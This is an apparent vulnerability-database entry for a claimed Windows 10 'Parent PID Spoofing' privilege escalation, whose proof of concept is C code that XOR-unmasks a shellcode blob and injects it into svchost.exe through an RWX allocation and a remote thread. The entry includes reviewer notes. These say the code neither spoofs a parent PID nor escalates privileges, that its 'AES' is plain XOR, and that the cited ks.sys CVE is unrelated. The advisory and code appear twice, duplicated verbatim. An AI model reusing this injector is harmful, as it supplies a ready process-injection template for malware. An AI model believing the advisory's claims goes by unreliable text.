7.8
/ 10
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Description
Microsoft Windows 10 Famille version 10.0.19045.5487 suffers from a parent PID spoofing privilege escalation vulnerability... Reviewer note: the proof of concept published with this entry neither spoofs a parent PID nor crosses a privilege boundary. It opens an already-running svchost.exe with PROCESS_ALL_ACCESS and starts a remote thread in it, which only succeeds for a caller that already holds that access. Read it as a user-mode process-injection demonstration, not as evidence of a Windows vulnerability.
Basic Information
ID
PACKETSTORM:212318
Published
Dec 2, 2025 at 00:00
Affected Product
Affected Versions
=============================================================================================================================================
| # Title : Microsoft Windows 10 Famille 10.0.19045.5487 (Parent PID Spoofing) Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) -- the browser is irrelevant to a local C proof of concept; note that the title names the Famille (Home) edition while testing was done on Pro |
| # Vendor : https://www.Microsoft.com |
=============================================================================================================================================
POC :
[+] Dorking in Google or another search engine.
[+] Code Description: The ks.sys driver on Microsoft Windows is one of the core components of Kernel Streaming and is installed by default.
There exists a local privilege escalation vulnerability in this driver that can be exploited on many recent versions of Windows 10, Windows 11 and Windows Server 2022; that issue is the subject of the related CVE-2024-35250 advisory linked below. Note that the code in this entry never touches ks.sys or any kernel component: it is a user-mode shellcode injector.
[+] The idea:
Parent PID Spoofing is a technique used to run a malicious process under a trusted process,
helping it avoid detection by security software. This is done by setting the parent process identifier (PPID) of the newly created process to the PID of a trusted process (such as explorer.exe or lsass.exe). Note that the proof of concept below never creates a process, so this step is described here but not implemented in the code.
[+] The goal:
Launching a malicious payload inside a legitimate process such as explorer.exe or svchost.exe to avoid detection by antivirus (AV) or endpoint detection and response (EDR) products. In practice an RWX allocation followed by a remote thread in svchost.exe is exactly the pattern such products alert on, so the evasion claim should not be taken at face value.
(Related : https://packetstorm.news/files/id/182984/ Related CVE numbers: CVE-2024-35250) .
[+] Combine Parent PID Spoofing with Shellcode to execute advanced payload
After obtaining a handle to the target PID, we can inject shellcode into that process and execute the code directly.
1. Update the code to inject Shellcode into the new process
[+] The idea:
After creating the process under a trusted PID (e.g. explorer.exe), we will:
Allocate memory inside the target process with VirtualAllocEx (MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE).
Copy the shellcode into the allocated memory with WriteProcessMemory.
Execute the shellcode on a new remote thread. The code below does this with NtCreateThreadEx resolved from ntdll.dll through GetProcAddress, not with CreateRemoteThread as stated here; for this purpose the two are functionally similar.
[+] gcc -o poc.exe poc.c -m64
[+] poc.exe
[+] PayLoad :
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <winternl.h>
/* Prototype of ntdll!NtCreateThreadEx, resolved at run time with
 * GetProcAddress in main().  Parameter names are informational only;
 * this PoC passes zero for the last four. */
typedef NTSTATUS (WINAPI *pNtCreateThreadEx)(
    PHANDLE     thread_handle,
    ACCESS_MASK desired_access,
    PVOID       object_attributes,
    HANDLE      process_handle,
    PVOID       start_routine,
    PVOID       argument,
    ULONG       create_flags,
    ULONG       zero_bits,
    ULONG       stack_size,
    ULONG       maximum_stack_size,
    PVOID       attribute_list
);

/* 32-byte payload blob.  Despite the original "AES-128" label it is only
 * XOR-masked with the repeating 16-byte key below (see decrypt_shellcode).
 * Nothing in this file documents what the bytes decode to, so treat the
 * blob as a placeholder rather than a known-working payload. */
unsigned char encrypted_shellcode[] = {
    0x8d, 0xa3, 0x5c, 0xa7, 0xc3, 0x7f, 0x6c, 0xf2,
    0x8e, 0x91, 0xad, 0x33, 0x2b, 0xfe, 0x04, 0x74,
    0xd9, 0x41, 0xf5, 0x1a, 0xe4, 0x8d, 0xbc, 0xa3,
    0x6f, 0xd0, 0x56, 0xbb, 0x9a, 0x2d, 0x5e, 0xf1
};

/* Repeating XOR mask.  The name is historical: no AES is performed, and
 * a hard-coded key embedded next to the data provides no confidentiality. */
unsigned char aes_key[16] = {
    0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6,
    0xab, 0xf7, 0x45, 0x3e, 0x67, 0x98, 0x23, 0x10
};
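/* In-place XOR unmasking of the payload buffer.
 *
 * Despite the name this is NOT AES: byte i is XORed with key[i % 16], a
 * repeating 16-byte mask.  It only hides the bytes from trivial string
 * scanning and gives no confidentiality.  XOR is its own inverse, so the
 * same call both masks and unmasks.
 *
 * data      buffer transformed in place; NULL is tolerated (no-op)
 * data_len  number of bytes in data; a non-positive length is a no-op
 * key       mask; only its first 16 bytes are read, NULL is a no-op
 */
void decrypt_shellcode(unsigned char* data, int data_len, const unsigned char* key) {
    if (data == NULL || key == NULL) {
        return;
    }
    for (int i = 0; i < data_len; i++) {
        data[i] ^= key[i % 16];
    }
}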
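/* Return the PID of the first process in a Toolhelp snapshot whose image
 * name equals processName, or 0 when there is no match, processName is
 * NULL, or the snapshot cannot be taken.
 *
 * The comparison is case-insensitive (lstrcmpiA), in line with Windows
 * file-name semantics; the original strcmp would have missed a name
 * reported as "SVCHOST.EXE".
 *
 * Caveat: "first match" is simply snapshot order.  For an image with many
 * instances (svchost.exe) the returned PID is effectively arbitrary -- no
 * session, owner or integrity-level check is made here.
 */
DWORD FindTargetProcessID(const char* processName) {
    if (processName == NULL) {
        return 0;
    }

    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE) {
        return 0;
    }

    DWORD found = 0;
    PROCESSENTRY32 entry = {0};
    entry.dwSize = sizeof(entry);   /* Process32First requires dwSize set */

    for (BOOL ok = Process32First(snapshot, &entry); ok; ok = Process32Next(snapshot, &entry)) {
        if (lstrcmpiA(entry.szExeFile, processName) == 0) {
            found = entry.th32ProcessID;
            break;
        }
    }

    CloseHandle(snapshot);
    return found;
}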
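/* Entry point: locate an svchost.exe, XOR-unmask the embedded blob, copy it
 * into an RWX region of that process and start a remote thread on it via
 * ntdll!NtCreateThreadEx.  Returns 0 on success, -1 on any failure.
 *
 * What this program does NOT do, despite the advisory text around it:
 *  - no parent-PID spoofing: no process is created, an existing one is opened;
 *  - no privilege escalation: OpenProcess(PROCESS_ALL_ACCESS) on a service
 *    host only succeeds for a caller already granted that access, so the
 *    injected thread runs with nothing the caller could not already obtain
 *    (review note: expected to fail with access denied from a non-admin
 *    session -- confirm);
 *  - no evasion: NtCreateThreadEx is still looked up with GetProcAddress,
 *    and RWX allocation + WriteProcessMemory + remote thread into svchost.exe
 *    is the canonical injection pattern endpoint products alert on.
 *
 * Fixes versus the original: printf specifiers now match DWORD/NTSTATUS,
 * NTSTATUS is tested by its sign (negative == failure) instead of != 0,
 * CreateFlags is passed as 0 rather than FALSE, and every error path
 * releases the handles and the remote allocation it acquired.
 */
int main(void) {
    int rc = -1;
    HANDLE hProcess = NULL;
    HANDLE hThread = NULL;
    LPVOID remoteMemory = NULL;
    HMODULE hNtdll = NULL;
    pNtCreateThreadEx NtCreateThreadEx = NULL;
    NTSTATUS status = 0;

    DWORD targetPID = FindTargetProcessID("svchost.exe");
    if (targetPID == 0) {
        printf("[X] لم يتم العثور على عملية svchost.exe\n");
        return -1;
    }
    printf("[+] سيتم حقن Shellcode في PID: %lu\n", (unsigned long)targetPID);

    /* XOR-unmask in place (not AES; see decrypt_shellcode). */
    decrypt_shellcode(encrypted_shellcode, (int)sizeof(encrypted_shellcode), aes_key);
    printf("[+] تم فك تشفير Shellcode بنجاح!\n");

    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID);
    if (!hProcess) {
        printf("[X] فشل في فتح العملية.\n");
        goto cleanup;
    }

    /* RWX page: writable and executable at once, a strong detection signal. */
    remoteMemory = VirtualAllocEx(hProcess, NULL, sizeof(encrypted_shellcode),
                                  MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!remoteMemory) {
        printf("[X] فشل في تخصيص الذاكرة داخل svchost.exe\n");
        goto cleanup;
    }

    if (!WriteProcessMemory(hProcess, remoteMemory, encrypted_shellcode,
                            sizeof(encrypted_shellcode), NULL)) {
        printf("[X] فشل في كتابة Shellcode داخل العملية.\n");
        goto cleanup;
    }

    hNtdll = GetModuleHandleA("ntdll.dll");
    if (!hNtdll) {
        printf("[X] فشل في تحميل ntdll.dll\n");
        goto cleanup;
    }
    NtCreateThreadEx = (pNtCreateThreadEx)GetProcAddress(hNtdll, "NtCreateThreadEx");
    if (!NtCreateThreadEx) {
        printf("[X] لم يتم العثور على NtCreateThreadEx.\n");
        goto cleanup;
    }

    /* NTSTATUS: 0 is STATUS_SUCCESS, failure codes have the sign bit set. */
    status = NtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL, hProcess,
                              remoteMemory, NULL, 0, 0, 0, 0, NULL);
    if (status < 0) {
        printf("[X] فشل في تنفيذ Shellcode (NTSTATUS: 0x%lx).\n", (unsigned long)status);
        hThread = NULL;
        goto cleanup;
    }
    printf("[+] تم تنفيذ Shellcode بنجاح باستخدام NtCreateThreadEx!\n");
    rc = 0;

cleanup:
    if (hThread) {
        CloseHandle(hThread);
    }
    if (rc != 0 && remoteMemory && hProcess) {
        /* Only on failure: on success the remote thread is executing from it. */
        VirtualFreeEx(hProcess, remoteMemory, 0, MEM_RELEASE);
    }
    if (hProcess) {
        CloseHandle(hProcess);
    }
    return rc;
}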
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
| # Title : Microsoft Windows 10 Famille 10.0.19045.5487 (Parent PID Spoofing) Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) -- the browser is irrelevant to a local C proof of concept; note that the title names the Famille (Home) edition while testing was done on Pro |
| # Vendor : https://www.Microsoft.com |
=============================================================================================================================================
POC :
[+] Dorking in Google or another search engine.
[+] Code Description: The ks.sys driver on Microsoft Windows is one of the core components of Kernel Streaming and is installed by default.
There exists a local privilege escalation vulnerability in this driver that can be exploited on many recent versions of Windows 10, Windows 11 and Windows Server 2022; that issue is the subject of the related CVE-2024-35250 advisory linked below. Note that the code in this entry never touches ks.sys or any kernel component: it is a user-mode shellcode injector.
[+] The idea:
Parent PID Spoofing is a technique used to run a malicious process under a trusted process,
helping it avoid detection by security software. This is done by setting the parent process identifier (PPID) of the newly created process to the PID of a trusted process (such as explorer.exe or lsass.exe). Note that the proof of concept below never creates a process, so this step is described here but not implemented in the code.
[+] The goal:
Launching a malicious payload inside a legitimate process such as explorer.exe or svchost.exe to avoid detection by antivirus (AV) or endpoint detection and response (EDR) products. In practice an RWX allocation followed by a remote thread in svchost.exe is exactly the pattern such products alert on, so the evasion claim should not be taken at face value.
(Related : https://packetstorm.news/files/id/182984/ Related CVE numbers: CVE-2024-35250) .
[+] Combine Parent PID Spoofing with Shellcode to execute advanced payload
After obtaining a handle to the target PID, we can inject shellcode into that process and execute the code directly.
1. Update the code to inject Shellcode into the new process
[+] The idea:
After creating the process under a trusted PID (e.g. explorer.exe), we will:
Allocate memory inside the target process with VirtualAllocEx (MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE).
Copy the shellcode into the allocated memory with WriteProcessMemory.
Execute the shellcode on a new remote thread. The code below does this with NtCreateThreadEx resolved from ntdll.dll through GetProcAddress, not with CreateRemoteThread as stated here; for this purpose the two are functionally similar.
[+] gcc -o poc.exe poc.c -m64
[+] poc.exe
[+] PayLoad :
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <winternl.h>
/* Prototype of ntdll!NtCreateThreadEx, resolved at run time with
 * GetProcAddress in main().  Parameter names are informational only;
 * this PoC passes zero for the last four. */
typedef NTSTATUS (WINAPI *pNtCreateThreadEx)(
    PHANDLE     thread_handle,
    ACCESS_MASK desired_access,
    PVOID       object_attributes,
    HANDLE      process_handle,
    PVOID       start_routine,
    PVOID       argument,
    ULONG       create_flags,
    ULONG       zero_bits,
    ULONG       stack_size,
    ULONG       maximum_stack_size,
    PVOID       attribute_list
);

/* 32-byte payload blob.  Despite the original "AES-128" label it is only
 * XOR-masked with the repeating 16-byte key below (see decrypt_shellcode).
 * Nothing in this file documents what the bytes decode to, so treat the
 * blob as a placeholder rather than a known-working payload. */
unsigned char encrypted_shellcode[] = {
    0x8d, 0xa3, 0x5c, 0xa7, 0xc3, 0x7f, 0x6c, 0xf2,
    0x8e, 0x91, 0xad, 0x33, 0x2b, 0xfe, 0x04, 0x74,
    0xd9, 0x41, 0xf5, 0x1a, 0xe4, 0x8d, 0xbc, 0xa3,
    0x6f, 0xd0, 0x56, 0xbb, 0x9a, 0x2d, 0x5e, 0xf1
};

/* Repeating XOR mask.  The name is historical: no AES is performed, and
 * a hard-coded key embedded next to the data provides no confidentiality. */
unsigned char aes_key[16] = {
    0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6,
    0xab, 0xf7, 0x45, 0x3e, 0x67, 0x98, 0x23, 0x10
};
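/* In-place XOR unmasking of the payload buffer.
 *
 * Despite the name this is NOT AES: byte i is XORed with key[i % 16], a
 * repeating 16-byte mask.  It only hides the bytes from trivial string
 * scanning and gives no confidentiality.  XOR is its own inverse, so the
 * same call both masks and unmasks.
 *
 * data      buffer transformed in place; NULL is tolerated (no-op)
 * data_len  number of bytes in data; a non-positive length is a no-op
 * key       mask; only its first 16 bytes are read, NULL is a no-op
 */
void decrypt_shellcode(unsigned char* data, int data_len, const unsigned char* key) {
    if (data == NULL || key == NULL) {
        return;
    }
    for (int i = 0; i < data_len; i++) {
        data[i] ^= key[i % 16];
    }
}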
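/* Return the PID of the first process in a Toolhelp snapshot whose image
 * name equals processName, or 0 when there is no match, processName is
 * NULL, or the snapshot cannot be taken.
 *
 * The comparison is case-insensitive (lstrcmpiA), in line with Windows
 * file-name semantics; the original strcmp would have missed a name
 * reported as "SVCHOST.EXE".
 *
 * Caveat: "first match" is simply snapshot order.  For an image with many
 * instances (svchost.exe) the returned PID is effectively arbitrary -- no
 * session, owner or integrity-level check is made here.
 */
DWORD FindTargetProcessID(const char* processName) {
    if (processName == NULL) {
        return 0;
    }

    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE) {
        return 0;
    }

    DWORD found = 0;
    PROCESSENTRY32 entry = {0};
    entry.dwSize = sizeof(entry);   /* Process32First requires dwSize set */

    for (BOOL ok = Process32First(snapshot, &entry); ok; ok = Process32Next(snapshot, &entry)) {
        if (lstrcmpiA(entry.szExeFile, processName) == 0) {
            found = entry.th32ProcessID;
            break;
        }
    }

    CloseHandle(snapshot);
    return found;
}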
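/* Entry point: locate an svchost.exe, XOR-unmask the embedded blob, copy it
 * into an RWX region of that process and start a remote thread on it via
 * ntdll!NtCreateThreadEx.  Returns 0 on success, -1 on any failure.
 *
 * What this program does NOT do, despite the advisory text around it:
 *  - no parent-PID spoofing: no process is created, an existing one is opened;
 *  - no privilege escalation: OpenProcess(PROCESS_ALL_ACCESS) on a service
 *    host only succeeds for a caller already granted that access, so the
 *    injected thread runs with nothing the caller could not already obtain
 *    (review note: expected to fail with access denied from a non-admin
 *    session -- confirm);
 *  - no evasion: NtCreateThreadEx is still looked up with GetProcAddress,
 *    and RWX allocation + WriteProcessMemory + remote thread into svchost.exe
 *    is the canonical injection pattern endpoint products alert on.
 *
 * Fixes versus the original: printf specifiers now match DWORD/NTSTATUS,
 * NTSTATUS is tested by its sign (negative == failure) instead of != 0,
 * CreateFlags is passed as 0 rather than FALSE, and every error path
 * releases the handles and the remote allocation it acquired.
 */
int main(void) {
    int rc = -1;
    HANDLE hProcess = NULL;
    HANDLE hThread = NULL;
    LPVOID remoteMemory = NULL;
    HMODULE hNtdll = NULL;
    pNtCreateThreadEx NtCreateThreadEx = NULL;
    NTSTATUS status = 0;

    DWORD targetPID = FindTargetProcessID("svchost.exe");
    if (targetPID == 0) {
        printf("[X] لم يتم العثور على عملية svchost.exe\n");
        return -1;
    }
    printf("[+] سيتم حقن Shellcode في PID: %lu\n", (unsigned long)targetPID);

    /* XOR-unmask in place (not AES; see decrypt_shellcode). */
    decrypt_shellcode(encrypted_shellcode, (int)sizeof(encrypted_shellcode), aes_key);
    printf("[+] تم فك تشفير Shellcode بنجاح!\n");

    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID);
    if (!hProcess) {
        printf("[X] فشل في فتح العملية.\n");
        goto cleanup;
    }

    /* RWX page: writable and executable at once, a strong detection signal. */
    remoteMemory = VirtualAllocEx(hProcess, NULL, sizeof(encrypted_shellcode),
                                  MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!remoteMemory) {
        printf("[X] فشل في تخصيص الذاكرة داخل svchost.exe\n");
        goto cleanup;
    }

    if (!WriteProcessMemory(hProcess, remoteMemory, encrypted_shellcode,
                            sizeof(encrypted_shellcode), NULL)) {
        printf("[X] فشل في كتابة Shellcode داخل العملية.\n");
        goto cleanup;
    }

    hNtdll = GetModuleHandleA("ntdll.dll");
    if (!hNtdll) {
        printf("[X] فشل في تحميل ntdll.dll\n");
        goto cleanup;
    }
    NtCreateThreadEx = (pNtCreateThreadEx)GetProcAddress(hNtdll, "NtCreateThreadEx");
    if (!NtCreateThreadEx) {
        printf("[X] لم يتم العثور على NtCreateThreadEx.\n");
        goto cleanup;
    }

    /* NTSTATUS: 0 is STATUS_SUCCESS, failure codes have the sign bit set. */
    status = NtCreateThreadEx(&hThread, THREAD_ALL_ACCESS, NULL, hProcess,
                              remoteMemory, NULL, 0, 0, 0, 0, NULL);
    if (status < 0) {
        printf("[X] فشل في تنفيذ Shellcode (NTSTATUS: 0x%lx).\n", (unsigned long)status);
        hThread = NULL;
        goto cleanup;
    }
    printf("[+] تم تنفيذ Shellcode بنجاح باستخدام NtCreateThreadEx!\n");
    rc = 0;

cleanup:
    if (hThread) {
        CloseHandle(hThread);
    }
    if (rc != 0 && remoteMemory && hProcess) {
        /* Only on failure: on success the remote thread is executing from it. */
        VirtualFreeEx(hProcess, remoteMemory, 0, MEM_RELEASE);
    }
    if (hProcess) {
        CloseHandle(hProcess);
    }
    return rc;
}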
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================